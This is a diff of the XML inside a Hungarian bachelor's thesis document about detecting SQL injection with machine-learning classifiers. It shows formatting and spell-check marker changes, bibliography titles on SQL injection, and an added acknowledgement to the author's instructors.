+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> futásnál jár</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -18765,11 +21126,19 @@
         </w:rPr>
         <w:t xml:space="preserve">oldaláról az </w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">first.fxml </w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>first.fxml</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -18801,6 +21170,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -18813,6 +21183,7 @@
         </w:rPr>
         <w:t>Controller</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -18825,12 +21196,14 @@
         </w:rPr>
         <w:t xml:space="preserve">e </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:t>toimport_vulnerabilities.php</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -18841,7 +21214,21 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>, majd navigál át a PrimaryController-be.</w:t>
+        <w:t xml:space="preserve">, majd navigál át a </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>PrimaryController</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>-be.</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -18895,7 +21282,35 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>„toimport” numpy fájlokba ment le.</w:t>
+        <w:t>„</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>toimport</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">” </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>numpy</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> fájlokba ment le.</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -18975,12 +21390,14 @@
         </w:rPr>
         <w:t xml:space="preserve">a </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:t>PrimaryController</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -19003,8 +21420,16 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>a hozzá tartozó primary.fxml</w:t>
-      </w:r>
+        <w:t xml:space="preserve">a hozzá tartozó </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>primary.fxml</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -19515,13 +21940,59 @@
           <w:lang w:val="hu-HU"/>
         </w:rPr>
       </w:pPr>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>Error Based SQL Injection (SQLi)</w:t>
+        <w:t>Error</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Based</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> SQL Injection (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>SQLi</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -19571,13 +22042,77 @@
           <w:lang w:val="hu-HU"/>
         </w:rPr>
       </w:pPr>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>Beginner Guide to SQL Injection Boolean Based (Part 2)</w:t>
+        <w:t>Beginner</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Guide</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>to</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> SQL Injection Boolean </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Based</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (Part 2)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -19633,7 +22168,61 @@
           <w:szCs w:val="20"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>Time Based Blind SQL Injection (SQLi)</w:t>
+        <w:t xml:space="preserve">Time </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Based</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Blind</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> SQL Injection (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>SQLi</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -19683,14 +22272,106 @@
           <w:lang w:val="hu-HU"/>
         </w:rPr>
       </w:pPr>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>Blind Out-of-band SQL Injection vulnerability testing added to AcuMonitor</w:t>
-      </w:r>
+        <w:t>Blind</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Out-of-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>band</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> SQL Injection </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>vulnerability</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> testing </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>added</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>to</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>AcuMonitor</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -19745,8 +22426,54 @@
           <w:szCs w:val="20"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>Mike Shema 2012. SQL Injection &amp; Data Store Manipulation</w:t>
-      </w:r>
+        <w:t xml:space="preserve">Mike </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Shema</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 2012. SQL Injection &amp; Data </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Store</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Manipulation</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -19801,8 +22528,54 @@
           <w:szCs w:val="20"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>SQL Injection Prevention Cheat Sheet</w:t>
-      </w:r>
+        <w:t xml:space="preserve">SQL Injection </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Prevention</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Cheat</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Sheet</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -19857,8 +22630,36 @@
           <w:szCs w:val="20"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>Alex Kaechele 2018. Classification</w:t>
-      </w:r>
+        <w:t xml:space="preserve">Alex </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Kaechele</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 2018. </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Classification</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -20124,6 +22925,87 @@
           <w:lang w:val="hu-HU"/>
         </w:rPr>
       </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Szeretnék köszönetet mondani egykori gyakorlat vezetőmnek, Tóth Lászlónak</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> és előadómnak, Vidács Lászlónak, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>aki</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>k</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> bevezet</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>tek</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> az információbiztonság világába</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> és </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>segítettek a program implementálása és a szakdolgozat megírása során. Bízom benne, hogy ezzel olyan úton indítottak el, a</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>min</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> még évtizedek múlva is </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>boldogan járhatok.</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -20251,7 +23133,35 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">a Logistic Regression </w:t>
+        <w:t xml:space="preserve">a </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Logistic</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Regression</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -20343,8 +23253,30 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>K-Nearest Neighbors</w:t>
-      </w:r>
+        <w:t>K-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Nearest</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Neighbors</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -20448,7 +23380,49 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">a Linear Support Vector </w:t>
+        <w:t xml:space="preserve">a </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Linear</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Support</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Vector</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>

--- a/szakdolgozat.docx
+++ b/szakdolgozat.docx
@@ -261,11 +261,11 @@
         <w:tblLook w:val="01E0" w:firstRow="1" w:lastRow="1" w:firstColumn="1" w:lastColumn="1" w:noHBand="0" w:noVBand="0"/>
       </w:tblPr>
       <w:tblGrid>
-        <w:gridCol w:w="741"/>
-        <w:gridCol w:w="3215"/>
-        <w:gridCol w:w="649"/>
-        <w:gridCol w:w="3315"/>
-        <w:gridCol w:w="583"/>
+        <w:gridCol w:w="768"/>
+        <w:gridCol w:w="3277"/>
+        <w:gridCol w:w="670"/>
+        <w:gridCol w:w="3402"/>
+        <w:gridCol w:w="602"/>
       </w:tblGrid>
       <w:tr>
         <w:tc>
@@ -668,7 +668,7 @@
           <w:lang w:val="hu-HU"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="1" w:name="_Toc72008730"/>
+      <w:bookmarkStart w:id="1" w:name="_Toc72158194"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -747,7 +747,7 @@
           <w:lang w:val="hu-HU"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="3" w:name="_Toc72008731"/>
+      <w:bookmarkStart w:id="3" w:name="_Toc72158195"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -1528,7 +1528,6 @@
           <w:docPartUnique/>
         </w:docPartObj>
       </w:sdtPr>
-      <w:sdtEndPr/>
       <w:sdtContent>
         <w:p>
           <w:pPr>
@@ -1540,7 +1539,7 @@
         <w:p>
           <w:pPr>
             <w:pStyle w:val="Cmsor2"/>
-            <w:spacing w:before="0" w:after="0"/>
+            <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
             <w:jc w:val="center"/>
             <w:rPr>
               <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -1549,7 +1548,7 @@
               <w:lang w:val="hu-HU"/>
             </w:rPr>
           </w:pPr>
-          <w:bookmarkStart w:id="4" w:name="_Toc72008732"/>
+          <w:bookmarkStart w:id="4" w:name="_Toc72158196"/>
           <w:r>
             <w:rPr>
               <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -1563,7 +1562,6 @@
         </w:p>
         <w:p>
           <w:pPr>
-            <w:spacing w:line="360" w:lineRule="auto"/>
             <w:rPr>
               <w:lang w:val="hu-HU"/>
             </w:rPr>
@@ -1602,7 +1600,7 @@
             </w:rPr>
             <w:fldChar w:fldCharType="separate"/>
           </w:r>
-          <w:hyperlink w:anchor="_Toc72008730" w:history="1">
+          <w:hyperlink w:anchor="_Toc72158194" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
@@ -1630,7 +1628,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc72008730 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc72158194 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1676,7 +1674,7 @@
               <w:lang w:val="hu-HU"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc72008731" w:history="1">
+          <w:hyperlink w:anchor="_Toc72158195" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
@@ -1704,7 +1702,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc72008731 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc72158195 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1750,7 +1748,7 @@
               <w:lang w:val="hu-HU"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc72008732" w:history="1">
+          <w:hyperlink w:anchor="_Toc72158196" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
@@ -1778,7 +1776,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc72008732 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc72158196 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1818,16 +1816,20 @@
             <w:spacing w:line="360" w:lineRule="auto"/>
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+              <w:b/>
+              <w:bCs/>
               <w:noProof/>
               <w:sz w:val="22"/>
               <w:szCs w:val="22"/>
               <w:lang w:val="hu-HU"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc72008733" w:history="1">
+          <w:hyperlink w:anchor="_Toc72158197" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
+                <w:b/>
+                <w:bCs/>
                 <w:noProof/>
                 <w:lang w:val="hu-HU"/>
               </w:rPr>
@@ -1835,6 +1837,8 @@
             </w:r>
             <w:r>
               <w:rPr>
+                <w:b/>
+                <w:bCs/>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
@@ -1842,6 +1846,8 @@
             </w:r>
             <w:r>
               <w:rPr>
+                <w:b/>
+                <w:bCs/>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
@@ -1849,19 +1855,25 @@
             </w:r>
             <w:r>
               <w:rPr>
+                <w:b/>
+                <w:bCs/>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc72008733 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc72158197 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
+                <w:b/>
+                <w:bCs/>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
             </w:r>
             <w:r>
               <w:rPr>
+                <w:b/>
